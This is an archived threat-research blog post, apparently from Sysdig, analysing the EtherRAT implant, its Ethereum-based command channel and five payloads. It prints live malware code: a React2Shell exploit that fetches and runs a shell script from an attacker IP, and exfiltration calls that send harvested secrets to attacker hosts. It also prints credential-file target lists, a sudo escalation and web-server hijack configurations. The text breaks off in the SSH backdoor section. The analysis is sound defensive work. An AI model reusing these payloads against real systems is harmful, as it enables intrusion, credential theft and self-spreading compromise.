{ "id": "a0a4e386-5b72-410e-8926-10bb63d2f518", "created_at": "2026-04-06T00:11:50.760832Z", "updated_at": "2026-04-10T03:37:08.771383Z", "deleted_at": null, "sha1_hash": "1137e8b9cb61c71a76fa284aff924e4f6936f935", "title": "EtherRAT dissected: How a React2Shell implant delivers 5 payloads through blockchain C2", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 402298, "plain_text": "EtherRAT dissected: How a React2Shell implant delivers 5\r\npayloads through blockchain C2\r\nBy Sysdig Threat Research Team\r\nPublished: 2025-12-16 · Archived: 2026-04-05 18:55:03 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nOn December 8, the Sysdig Threat Research Team (TRT) reported that a possible North Korean-linked actor had\r\ndeployed EtherRAT, a novel Ethereum-based implant, in React2Shell attacks. The malware goes beyond other\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 1 of 21\n\nReact2Shell cryptomining attacks, blending command and control (C2) traffic into blockchain activity and\r\naggressively harvesting credentials. Furthermore, the EtherRAT payloads never touch the disk, since they are run\r\nby Node.js. This is another example of fileless malware, which is becoming more common.\r\nThis blog marks the first time the React2Shell exploit has been publicly documented in active malware.\r\nFollowing its initial EtherRAT report, the Sysdig TRT retrieved live payloads from the attacker's C2 infrastructure.\r\nThis new blog examines the details of five modules found in the C2, revealing the full post-compromise\r\ncapabilities of EtherRAT:\r\n1. system reconnaissance\r\n2. credential harvesting\r\n3. a self-propagating worm\r\n4. web server hijacking\r\n5. SSH backdoor installation\r\nThe implant's blockchain-based C2 also provides an unexpected forensic advantage for defenders: every\r\ninfrastructure change is permanently recorded on Ethereum. \r\nThe Sysdig TRT also discovered the presence of a Commonwealth of Independent States (CIS) country exclusion,\r\ncomplicating the initial attribution, which is explored in the first payload section, system reconnaissance.\r\nRegardless of who is behind EtherRAT, what’s more important is understanding the threat to be able to defend\r\nagainst it. \r\nBefore exploring the 5 payloads the Sysdig TRT uncovered, let's review both React2Shell and EtherRAT.\r\nRecap: EtherRAT and React2Shell exploitation\r\nOn December 5, 2025, two days after CVE-2025-55182 disclosure (a maximum-severity remote code execution\r\n(RCE) in React Server Components), the Sysdig TRT recovered EtherRAT from a compromised Next.js\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 2 of 21\n\napplication. Unlike miners and stealers seen in early, China-linked React2Shell exploitation, EtherRAT is a\r\npersistent access implant.\r\nKey characteristics:\r\nBlockchain-based C2: Queries an Ethereum smart contract for the current C2 URL, avoiding hardcoded\r\ninfrastructure.\r\nConsensus-based RPC queries: Polls nine public Ethereum endpoints, selecting the majority response to\r\nprevent poisoning.\r\nFive persistence mechanisms: Systemd services, XDG autostart, cron jobs , bashrc injection, and\r\nprofile injection.\r\nSelf-updating payload: Sends its source to /api/reobf/ on first contact and replaces itself with the\r\nresponse.\r\nLegitimate runtime download: Fetches Node.js v20.10.0 from nodejs.org rather than bundling a flagged\r\nbinary.\r\nServer-side Node.js implants remain uncommon, though Microsoft Defender Experts noted in April 2025 that\r\nthey're \"quickly becoming a part of the continuously evolving threat landscape.\" Targeting Next.js guarantees\r\nNode.js availability. \r\nFor full technical details of EtherRAT, see the Sysdig TRT’s initial analysis.\r\nBlockchain forensics: Reconstructing attacker operations\r\nThe blockchain mechanism that provides resilient C2 resolution for the attacker also creates an immutable\r\nforensic record for researchers. Every C2 URL update is permanently recorded on Ethereum with timestamps,\r\ntransaction hashes, and wallet addresses. The attacker cannot delete or modify this history.\r\nThe Sysdig TRT developed custom tooling to extract and analyze the contract's state changes via historical binary\r\nsearch. Full transaction history is available on the deployer wallet's Etherscan page, but a sample is in the table\r\nbelow:\r\nContract deployment timeline example\r\nEvent Timestamp (UTC) Transaction\r\nAttacker wallet funded 2025-12-05 19:10:23 0xf74ed49b...\r\nContract deployed 2025-12-05 19:13:47 0x79708059...\r\nInitial C2 URL set 2025-12-05 19:19:59 0xe4efe4d2...\r\nThe contract was deployed on December 5, 2025, at 19:13:47 UTC, approximately five hours after CISA added\r\nCVE-2025-55182 to its Known Exploited Vulnerabilities catalog. The attacker's wallet received funding just three\r\nminutes before deployment, and the first C2 URL was configured six minutes after the contract went live. This\r\ntight sequence suggests the attacker had their exploit ready and moved quickly to operationalize it.\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 3 of 21\n\nPrimary C2 contract details\r\nThe lookup key is the attacker's own deployer wallet address. This design pattern ties the contract's data retrieval\r\nto a known address, but it also means the attacker's wallet is embedded in every deployed implant.\r\nC2 URL change history\r\nThe contract recorded nine state changes over three days:\r\nTimestamp\r\n(UTC)\r\nBlock C2 URL Notes\r\n2025-12-05\r\n19:19\r\n23,948,771 http://91.215.85.42:3000 Initial C2\r\n2025-12-06\r\n16:53\r\n23,955,140 http://173.249.8.102/ Secondary server\r\n2025-12-06\r\n16:54\r\n23,955,143 http://173.249.8.102\r\nTrailing slash\r\nremoved\r\n2025-12-06\r\n19:22\r\n23,955,874 http://91.215.85.42:3000 Primary server\r\n2025-12-06\r\n20:02\r\n23,956,075 http://173.249.8.102 Secondary server\r\n2025-12-06\r\n20:09\r\n23,956,110 http://91.215.85.42:3000 Primary server\r\n2025-12-08\r\n00:22\r\n23,964,494 https://grabify.link/SEFKGU IP logging service\r\n2025-12-08\r\n00:24\r\n23,964,503\r\nhttps://grabify.link/SEFKGU?\r\ndry87932wydes/fdsgdsfdsjfkl\r\nModified Grabify\r\nURL\r\n2025-12-08\r\n00:33\r\n23,964,550 http://91.215.85.42:3000\r\nPrimary server\r\n(current)\r\nThe switching between 91.215.85.42:3000 and 173.249.8.102 on December 6th indicates the attacker is using\r\nat least two C2 servers. The one-minute gap between entries two and three (removing a trailing slash) suggests a\r\nmanual configuration correction.\r\nVictim enumeration via Grabify\r\nThe most revealing detail from the attacker’s C2 infrastructure is the temporary insertion of a Grabify link on\r\nDecember 8th. Grabify logs visitor IPs, user agents, and geolocation.\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 4 of 21\n\nThe attacker configured the C2 resolver to return https://grabify.link/SEFKGU for approximately 11 minutes.\r\nAny infected machine polling for C2 would connect to Grabify and log to the attacker's dashboard. After this\r\nwindow, they reverted to the primary C2, consistent with enumerating active infections.\r\nOPSEC tradeoffs\r\nThe blockchain C2 provides resilience but creates forensic exposure:\r\nSingle wallet exposure: All nine updates originate from wallet 0xe941a9b2..., permanently associated with\r\nEtherRAT.\r\nImmutable audit trail: Every C2 URL, including the Grabify link, is permanently recorded. Traditional\r\nC2 can be erased; blockchain cannot.\r\nFunding chain visibility: The wallet was funded by 0x14afddd6... three minutes before deployment.\r\nThird-party service usage: Grabify maintains logs, potentially including the attacker's IP.\r\nPayload analysis #1: System reconnaissance\r\nBy querying the blockchain contract, the Sysdig TRT retrieved live payloads from the attacker's infrastructure.\r\nThe first is a reconnaissance module that fingerprints infected hosts.\r\nCIS country exclusion\r\nThe most significant finding is a locale check that causes the malware to self-destruct on systems configured for\r\ncertain languages:\r\nconst _chkLocale = () =\u003e {\r\n const banned = ['ru','be','kk','ky','tg','uz','hy','az','ka'];\r\n // ... checks system locale against banned list\r\n};\r\nif (_chkLocale()) {\r\n _selfDestruct();\r\n return;\r\n}\r\nThe banned locales correspond to the Commonwealth of Independent States (CIS) countries:\r\nCode Language Country\r\nru Russian Russia\r\nbe Belarusian Belarus\r\nkk Kazakh Kazakhstan\r\nky Kyrgyz Kyrgyzstan\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 5 of 21\n\nCode Language Country\r\ntg Tajik Tajikistan\r\nuz Uzbek Uzbekistan\r\nhy Armenian Armenia\r\naz Azerbaijani Azerbaijan\r\nka Georgian Georgia\r\nThis \"CIS exclusion\" pattern is well-documented in Russian and Eastern European cybercrime reporting. Actors\r\nfrom these regions exclude CIS countries to avoid local legal ramifications. \r\nAlthough a majority of EtherRAT tactics, techniques, and procedures (TTPs) align with Democratic People’s\r\nRepublic of Korea (DPRK)-linked threat actors, the presence of the CIS country exclusion conflicts with DPRK\r\nattribution. North Korean actors don't typically implement CIS exclusions. This suggests either the attacker is: \r\nA CIS-based actor who added the exclusion and is using shared, reported tooling from DPRK to add\r\nobfuscation.\r\nA DPRK- or otherwise non-CIS-based actor who copied a portion of code from Russian tooling that\r\nincluded the exclusion.\r\nUsing a red herring to mislead investigators.\r\nSystem information collection\r\nThe payload collects extensive host data for victim profiling:\r\nCategory Data collected\r\nIdentity Username, hostname, MAC address, machine GUID\r\nHardware CPU model/cores, total/free memory, GPU\r\nNetwork Public IP (via ipify APIs), domain membership\r\nEnvironment OS version, architecture, Node.js version, uptime\r\nSecurity Antivirus products, admin/root privileges\r\nThe domain membership check is particularly notable in a multi-platform attack script. It determines whether the\r\nhost is part of an Active Directory domain and whether the current user has administrative privileges:\r\nconst getDomainInfo = () =\u003e {\r\n let domain = 'WORKGROUP', inDomain = false, isAdmin = false;\r\n // Windows: checks Win32_ComputerSystem.PartOfDomain\r\n // Linux: checks hostname -d / dnsdomainname\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 6 of 21\n\n// Also checks for admin via 'net session' (Windows) or UID 0 (Linux)\r\n return { domain, inDomain, isAdmin };\r\n};\r\nThis profiling data allows operators to identify high-value targets (domain-joined corporate systems with\r\nadministrative access) for further exploitation.\r\nThe GPU enumeration is also significant. Detailed GPU detection across multiple methods ( lspci , glxinfo ,\r\nWMI queries) suggests operators are evaluating systems for cryptomining potential, which aligns with\r\nopportunistic cryptomining seen in early React2Shell exploitation by other attackers.\r\nAntivirus detection\r\nThe payload checks for security products on both Windows and Linux to operate in both environments:\r\n// Windows: queries SecurityCenter2 WMI namespace\r\n// Linux: searches process list for known AV processes\r\nconst avProcesses = ['clamd', 'freshclam', 'sophos', 'avast', 'eset', 'kaspersky', 'comodo'];\r\nC2 exfiltration\r\nCollected data is exfiltrated via HTTP POST with aggressive retry logic (up to 100 attempts with exponential\r\nbackoff):\r\nconst serverUrl = \"http://91.215.85.42:3000\";\r\nconst hwid = getHWID();\r\nconst postUrl = `${serverUrl}/${hwid}`;\r\nawait sendWithRetry(postUrl, info);\r\nPayload analysis #2: Credential harvester\r\nA second payload reveals EtherRAT's primary objective: comprehensive credential and cryptocurrency theft,\r\ndelivered after initial reconnaissance. It targets crypto wallets in a more sophisticated manner than the typical light\r\nscanning often seen, while also collecting over 50 other types of credentials.\r\nBIP39 seed phrase detection\r\nThe payload embeds the complete BIP39 wordlist, consisting of all 2,048 words used to generate cryptocurrency\r\nwallet seed phrases:\r\nconst BIP39_WORDS = [\r\n \"abandon\", \"ability\", \"able\", \"about\", \"above\", \"absent\", \"absorb\", \"abstract\",\r\n // ... 2,040 additional words\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 7 of 21\n\n\"zero\", \"zone\", \"zoo\"\r\n];\r\nconst BIP39_SET = new Set(BIP39_WORDS);\r\nThe harvester uses two detection methods. First, it searches for BIP39 words near terms like mnemonic , seed ,\r\nrecovery , or wallet . Second, it performs a sliding window scan, checking every sequence of 12–24\r\nconsecutive words against the BIP39 set:\r\nfor (const len of [24, 21, 18, 15, 12]) {\r\n if (words.length \u003e= len) {\r\n const slice = words.slice(0, len);\r\n if (slice.every(w =\u003e BIP39_SET.has(w))) {\r\n addFinding('seed_phrase', filePath, slice.join(' '));\r\n break;\r\n }\r\n }\r\n}\r\nThis two-part approach prioritizes 24-word phrases (256 bits of entropy) over shorter variants, maximizing the\r\nvalue of recovered seeds.\r\nFile-based BIP39 scanning is an emerging technique. SANS ISC documented a Python infostealer in November\r\n2024 using this approach, but EtherRAT's implementation is more sophisticated:\r\nFeature SANS-documented stealer EtherRAT harvester\r\nBIP39 validation External mnemonic module Embedded 2,048-word array\r\nDetection method Line-by-line check Keyword search + sliding window\r\nPhrase lengths 12, 16, 24 words 12, 15, 18, 21, 24 words\r\nDependencies Requires pip install at runtime Self-contained\r\nPrivate key validation None secp256k1 curve order check\r\nThe embedded wordlist, sliding window scan, and elliptic curve validation demonstrate cryptocurrency expertise\r\nbeyond typical stealers.\r\nTargeted secret patterns\r\nThe credential harvester includes 50+ regex patterns organized by category:\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 8 of 21\n\nCategory Patterns Examples\r\nCrypto keys 4 Ethereum private keys (64 hex chars), PEM/SSH private keys\r\nGitHub/Git 8 ghp_ , gho_ , github_pat_ , GitLab glpat- , Bitbucket ATBB\r\nCloud\r\nproviders\r\n14 AWS AKIA , GCP AIza , Azure SAS tokens, DigitalOcean dop_v1_\r\nDatabase 6 PostgreSQL/MySQL/MongoDB/Redis connection strings, DB_PASSWORD\r\nAPI Keys 17\r\nStripe sk_live_ , SendGrid SG. , Slack xox[baprs]- , OpenAI sk- ,\r\nAnthropic sk-ant-Wallets 2\r\nBitcoin WIF keys ([5KL][1-9A-HJ-NP-Za-km-z]{50,51}) , Ethereum\r\nkeystores\r\nThe Ethereum private key validation doesn't just match 64-character hex strings but validates against the\r\nsecp256k1 curve order:\r\nconst isValidPrivateKey = (hex) =\u003e {\r\n if (!/^[a-fA-F0-9]{64}$/.test(hex)) return false;\r\n const bn = BigInt('0x' + hex);\r\n const max = BigInt('0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364140');\r\n return bn \u003e 0n \u0026\u0026 bn \u003c max;\r\n};\r\nThis eliminates false positives from random hex strings and indicates familiarity with cryptocurrency internals.\r\nWallet directory harvesting\r\nThe payload specifically targets cryptocurrency wallet storage locations:\r\nWindows:\r\n%APPDATA%\\Ethereum, %APPDATA%\\Bitcoin , %APPDATA%\\Exodus , %APPDATA%\\atomic\r\n%LOCALAPPDATA%\\Coinbase , %APPDATA%\\Electrum\r\nChrome/Brave extension storage (MetaMask, Phantom, etc.)\r\nLinux:\r\n~/.ethereum , ~/.bitcoin , ~/.exodus , ~/.atomic , ~/.electrum\r\n~/.config/google-chrome/Default/Local Extension Settings\r\n~/.config/BraveSoftware/Brave-Browser/Default/Local Extension Settings\r\nBrowser extension storage is particularly valuable because this is where browser-based wallets like MetaMask\r\nstore encrypted vault data. With the encrypted vault and a weak password, attackers can brute-force access to\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 9 of 21\n\nwallet keys.\r\nCloud and infrastructure credential theft\r\nBeyond cryptocurrency, the harvester targets cloud provider and infrastructure credentials:\r\nAWS:\r\n~/.aws/credentials , ~/.aws/config\r\nAccess keys ( AKIA ), secret keys, session tokens\r\nGoogle Cloud:\r\n~/.config/gcloud/credentials.db , application_default_credentials.json\r\nService account JSON files\r\nAzure:\r\n~/.azure/accessTokens.json , azureProfile.json\r\nKubernetes:\r\n~ /.kube/config , /etc/kubernetes/admin.conf\r\nOther:\r\nDocker configs, Git credentials, Terraform state files\r\nSSH private keys ( id_rsa , id_ed25519 , id_ecdsa )\r\nHashiCorp Vault tokens, npm/pip credentials\r\nInteresting files and scan strategy\r\nThe payload maintains a list of 50+ high-value filenames:\r\nconst INTERESTING_FILES = [\r\n '.env', '.env.local', '.env.production', '.env.development', '.env.staging',\r\n 'wallet.json', 'keystore.json', 'wallet.dat', 'key.json',\r\n 'id_rsa', 'id_ed25519', 'id_ecdsa', 'id_dsa',\r\n '.npmrc', '.pypirc', '.netrc', '.htpasswd',\r\n 'docker-compose.yml', '.git-credentials',\r\n 'terraform.tfvars', '*.tfstate',\r\n 'service-account.json', 'firebase-adminsdk.json',\r\n // ... additional files\r\n];\r\nThe scan recursively walks search directories (home directories, /var/www , /opt , /srv, /etc on Linux;\r\nC:\\Users, C:\\inetpub\\wwwroot , XAMPP/WAMP roots on Windows) up to 10 levels deep, examining files that\r\nmatch interesting names or extensions ( .env , .json , .yml , . key , .pem , etc.). \r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 10 of 21\n\nThis exhaustive payload scanner indicates that the attacker’s objective goes beyond opportunistic cryptomining or\r\nbasic credential harvesting. It ensures any file likely to contain credentials, API keys, certificates, and other\r\nsensitive data is identified, leaving no stone unturned.\r\nThe code also includes anti-detection logic that skips files that appear to be its own payloads and avoids\r\nobfuscated content:\r\n// Skip payload/bot files\r\nconst fileName = path.basename(filePath).toLowerCase();\r\nif (/^\\.?[a-z0-9]{6,12}\\.js$/.test(fileName)) return;\r\nif (fileName.includes('payload') || fileName.includes('loader')) return;\r\nShell history mining\r\nThe harvester reads shell history files to extract credentials from command-line history:\r\nconst histFiles = isWin ? [\r\n 'AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt',\r\n] : [\r\n '~/.bash_history', '~/.zsh_history',\r\n '/root/.bash_history', '/root/.zsh_history',\r\n];\r\nDevelopers frequently pass credentials as command-line arguments or environment variables, making shell history\r\na reliable source of leaked secrets.\r\nExfiltration\r\nOnce collected from the extensive search of the compromised system, harvested credentials are exfiltrated to the\r\nsame C2 server via a dedicated endpoint:\r\nconst serverUrl = \"http://91.215.85.42:3000\";\r\nawait fetch(`${serverUrl}/crypto/keys`, {\r\n method: 'POST',\r\n headers: { 'Content-Type': 'application/json' },\r\n body: JSON.stringify({\r\n botHwid: getHWID(),\r\n ip: await getPublicIP(),\r\n hostname: os.hostname(),\r\n findings // Array of all discovered secrets\r\n })\r\n});\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 11 of 21\n\nThe /crypto/keys endpoint name and the extensive cryptocurrency-focused collection capabilities confirm\r\nfinancial theft as the primary objective.\r\nPayload analysis #3: React2Shell worm\r\nThe third payload retrieved from the C2 server transforms EtherRAT from a standalone implant into a self-spreading worm (bringing back painful memories of the Shai-Hulud worm seen twice in the fall). This module\r\ncontinuously scans the internet for vulnerable Next.js servers and exploits React2Shell (CVE-2025-55182) to\r\npropagate the same vulnerability used in the initial compromise.\r\nScanning infrastructure\r\nThe worm generates random IP addresses and probes common web ports:\r\nconst PORTS = [80, 443, 3000, 3001, 8080, 8443];\r\nconst CONCURRENCY = 500;\r\nconst TIMEOUT = 3000;\r\nWith 500 concurrent connections and a three-second timeout, a single infected host can scan approximately\r\n10,000 IP:Port combinations per minute. The scanner excludes its own IP addresses to avoid self-detection but\r\nnotably includes private network ranges (10.x.x.x, 172.16-31.x.x, 192.168.x.x), enabling lateral movement within\r\ncompromised networks.\r\nNext.js fingerprinting\r\nBefore attempting exploitation, the worm identifies Next.js servers through multiple detection methods:\r\nconst isNext = async (ip, port) =\u003e {\r\n const res = await req(ip, port);\r\n if (!res) return false;\r\n const h = res.headers, b = res.body || '';\r\n return h['x-powered-by']?.includes('Next.js') ||\r\n h['x-nextjs-page'] ||\r\n b.includes('/_next/') ||\r\n b.includes('__NEXT_DATA__');\r\n};\r\nThe fingerprinting checks for the X-Powered-By: Next.js header, the X-NextJS-Page header, and Next.js\r\nartifacts in the response body ( /_next/ static paths or the __NEXT_DATA__ hydration script). This multi-method\r\napproach maximizes detection even when servers have partial header suppression.\r\nCVE-2025-55182 exploit\r\nThe rce function contains a working React2Shell exploit. This is the first time this payload structure has been\r\npublicly documented in active malware:\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 12 of 21\n\nconst rce = async (ip, port) =\u003e {\r\n const cmd = `(curl -s ${SHELL_URL} -o /tmp/s.sh||wget -q -O /tmp/s.sh ${SHELL_URL})\u0026\u0026chmod +x /tmp/s.sh\u0026\u0026/tm\r\n const b64 = Buffer.from(cmd).toString('base64');\r\n const code = `var cp=process.mainModule.require(\"child_process\");try{cp.exec(\"echo ${b64}|base64 -d|sh\")}cat\r\n \r\n const chunk = JSON.stringify({\r\n then: '$1:__proto__:then',\r\n status: 'resolved_model',\r\n value: '{\"then\":\"$B1337\"}',\r\n reason: -1,\r\n _response: {\r\n _prefix: code + '//',\r\n _chunks: '$Q2',\r\n _formData: { get: '$1:constructor:constructor' }\r\n }\r\n });\r\n \r\n // Multipart form construction...\r\n const res = await req(ip, port, {\r\n method: 'POST',\r\n headers: {\r\n 'Content-Type': `multipart/form-data; boundary=${bd}`,\r\n 'Next-Action': 'a'.repeat(40)\r\n },\r\n body\r\n });\r\n};\r\nThe exploit uses prototype pollution ( $1:__proto__:then ) combined with React Server Components' streaming\r\nprotocol to achieve remote code execution. Key elements include the Next-Action header (40 characters,\r\ntriggering Server Action processing), a malformed multipart payload that pollutes the response object prototype,\r\nand constructor chain access ( $1:constructor:constructor ) to reach the Function constructor. The\r\n_response._prefix field contains the actual payload, Node.js code that uses child_process.exec() to run\r\nshell commands.\r\nSecondary C2 infrastructure\r\nThe worm reveals a second C2 server:\r\nconst SHELL_URL = 'http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh';\r\nServer Role Port\r\n91.215.85.42 Primary C2 (recon, credentials) 3000\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 13 of 21\n\nServer Role Port\r\n193.24.123.68 Propagation payload delivery 3001\r\nThe second server hosts the shell script deployed to newly compromised hosts. The potentially obfuscated\r\nfilename ( gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh ) provides minimal protection against automated detection.\r\nWorm targeting\r\nThe module runs indefinitely, continuously generating targets:\r\nwhile (true) {\r\n const ips = Array.from({ length: 10 }, randIP);\r\n for (const ip of ips) {\r\n for (const port of PORTS) {\r\n // Scan and exploit...\r\n }\r\n }\r\n}\r\nSuccessful compromises are logged locally:\r\nconst logFile = path.join(os.tmpdir(), 'nextjs_scan.log');\r\n// [FOUND] 192.168.1.50:3000 - Next.js detected\r\n// [SHELL] 192.168.1.50:3000 - Exploit successful\r\nThis log file could be exfiltrated by subsequent C2 tasking, giving the attackers visibility into the worm's\r\npropagation success rate.\r\nLateral movement implications\r\nUnlike typical internet worms that skip private IP ranges, the EtherRAT worm explicitly includes them:\r\nconst randIP = () =\u003e {\r\n const a = Math.random() * 256 | 0;\r\n if (a === 0 || a \u003e= 224) return randIP(); // Skip 0.x.x.x and multicast\r\n // Private ranges (10.x, 172.16-31.x, 192.168.x) are NOT excluded\r\n const ip = `${a}.${...}`;\r\n if (ownIPs.has(ip)) return randIP(); // Only skip own IPs\r\n return ip;\r\n};\r\nThis means a single compromise in a corporate environment can propagate to internal Next.js development\r\nservers, CI/CD pipelines, and staging environments, significantly expanding the attack surface beyond the initially\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 14 of 21\n\ncompromised host.\r\nPayload analysis #4: Web server hijacker\r\nThe fourth payload retrieved from the C2 server is rarely seen anymore. Rather than stealing data, it hijacks the\r\ncompromised server's web traffic. The module rewrites nginx and Apache configurations to redirect all visitors to\r\nxss.pro, a notorious Russian-language cybercrime forum.\r\nTarget Domain\r\nconst TARGET_DOMAIN = 'xss.pro';\r\nconst TARGET_URL = `https://${TARGET_DOMAIN}`;\r\nconst WEBHOOK_URL = 'https://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361';\r\nXSS.pro is the replacement clearweb domain for the XSS forum, one of the largest Russian-language cybercrime\r\nmarketplaces. The forum's original domain (xss.is) was seized by Europol in July 2025, and its administrator,\r\n\"Toha,\" was arrested in Kyiv after allegedly earning over €7 million from ad placements and service fees. The\r\nxss.pro domain emerged in August 2025 under new, unverified administration.\r\nThe forum's current status is uncertain. Former moderators abandoned the platform and launched a competing\r\nforum (DamageLib), warning that xss.pro is likely a law enforcement honeypot. User activity reportedly\r\ncollapsed, and most reputable threat actors have migrated elsewhere. The presence of this redirect target in an\r\nactive December 2025 payload suggests either that the attacker hasn't updated their tooling since before the July\r\nseizure, or they maintain affiliate relationships with whoever currently controls the domain.\r\nRegardless of the forum's current state, the intended monetization model is clear: the forum's historical ad-based\r\nrevenue structure meant that driving visitors generated income for actors with advertising arrangements. This\r\nrepresents a low-effort monetization path for compromised infrastructure. Rather than maintaining separate\r\nmalware delivery or phishing pages, the attacker simply redirects all traffic to an existing platform where volume\r\ntranslates to revenue.\r\nThe redirect mechanism itself is notably unsophisticated. The payload uses HTTP 301 permanent redirects,\r\nmeaning visitors see the URL change in their browser address bar: they type legitimate-site.com, for example, and\r\nthen visibly land on xss.pro. This is not a transparent proxy or hidden iframe that conceals the destination. Users\r\nwould immediately notice something is wrong, particularly if xss.pro displays a login page, error, or seizure\r\nbanner. This blunt approach suggests the payload prioritizes volume over stealth, functioning more as service\r\ndisruption or crude traffic generation than a targeted attack. It could also be a Denial of Service attack where the\r\nvictim's users get redirected.\r\nServer-side redirect malware targeting nginx and Apache was a well-documented threat in the early 2010s.\r\nCampaigns like Darkleech infected tens of thousands of servers with malicious Apache modules that injected\r\nhidden iframes to redirect visitors to exploit kits. That ecosystem largely collapsed after the Blackhole exploit kit\r\ntakedown in 2013, and public reporting on comparable nginx/Apache redirect malware has been sparse since.\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 15 of 21\n\nEtherRAT's web server hijacker payload represents a cruder approach than its predecessors (config replacement\r\nrather than module injection), but its presence in an active 2025 campaign suggests the technique is seeing\r\nrenewed use for forum traffic monetization.\r\nNginx configuration hijacking\r\nThe payload systematically processes nginx configuration directories:\r\nconst dirs = [\r\n '/etc/nginx/sites-enabled',\r\n '/etc/nginx/conf.d',\r\n '/etc/nginx/sites-available'\r\n];\r\nFor each configuration file, it extracts existing SSL certificates and server names, then replaces the entire\r\nconfiguration with a redirect:\r\nlet newConf = `# Redirect to ${TARGET_URL}\\n`;\r\nif (has443) {\r\n const sslCert = ssl?.cert || '/etc/ssl/certs/ssl-cert-snakeoil.pem';\r\n const sslKey = ssl?.key || '/etc/ssl/private/ssl-cert-snakeoil.key';\r\n \r\n newConf += `server {\r\n listen 443 ssl;\r\n listen [::]:443 ssl;\r\n server_name ${serverName};\r\n ssl_certificate ${sslCert};\r\n ssl_certificate_key ${sslKey};\r\n return 301 ${TARGET_URL}$request_uri;\r\n}\\n`;\r\n}\r\nThe payload preserves existing SSL certificates to maintain HTTPS functionality, so visitors see a valid certificate\r\nfor the original domain before being redirected. Original configurations are backed up with a .bak extension\r\nbefore modification.\r\nApache hijacking\r\nApache configurations receive similar treatment, with existing virtual hosts disabled and replaced with a universal\r\nredirect:\r\nconst redirect = `\u003cVirtualHost *:80\u003e\r\n ServerName _default_\r\n Redirect 301 / ${TARGET_URL}/\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 16 of 21\n\n\u003c/VirtualHost\u003e\r\n\u003cVirtualHost *:443\u003e\r\n ServerName _default_\r\n SSLEngine on\r\n SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem\r\n SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key\r\n Redirect 301 / ${TARGET_URL}/\r\n\u003c/VirtualHost\u003e`;\r\nfs.writeFileSync(path.join(dir, '000-redirect.conf'), redirect);\r\nThe 000- prefix ensures the redirect configuration loads first, taking precedence over any remaining\r\nconfigurations.\r\nPrivilege escalation attempts\r\nIf the payload runs without root privileges, it attempts to re-execute the hijacking logic with elevated permissions:\r\nconst cmds = [\r\n `sudo node -e \"${elevateScript.replace(/\"/g, '\\\\\"').replace(/\\n/g, '')}\"`,\r\n `sudo su -c 'node -e \"${elevateScript...}\"'`\r\n];\r\nThe node -e flag executes JavaScript passed directly as a command-line argument, avoiding the need to write a\r\nseparate script file to disk. By wrapping this in sudo , the payload attempts to run the nginx modification code as\r\nroot. This approach leaves fewer filesystem artifacts than dropping and executing a temporary script.\r\nReconnaissance exfiltration\r\nBefore and after modification, the payload reports extensive system information to a “webhook.site” endpoint:\r\nconst report = {\r\n hostname: os.hostname(),\r\n ip: run('curl -s ifconfig.me'),\r\n user: os.userInfo().username,\r\n uid: process.getuid ? process.getuid() : -1,\r\n platform: os.platform(),\r\n target: TARGET_URL,\r\n logs,\r\n nginxTest: run('nginx -t 2\u003e\u00261'),\r\n apacheTest: run('apachectl -t 2\u003e\u00261'),\r\n services: run('ps aux | grep -E \"nginx|apache|httpd|caddy\"'),\r\n configs: run('ls -la /etc/nginx/sites-enabled/ /etc/nginx/conf.d/'),\r\n timestamp: new Date().toISOString()\r\n};\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 17 of 21\n\nThe use of “webhook.site” (a legitimate debugging service) for exfiltration is notable because it provides a\r\ndisposable, anonymous endpoint that doesn't require attacker-controlled infrastructure.\r\nPayload analysis #5: SSH backdoor\r\nThe fifth payload is the simplest in the EtherRAT toolkit, a classic SSH persistence mechanism that appends the\r\nattacker's public key to the victim's authorized_keys file:\r\nconst publicKey = 'ssh-rsa 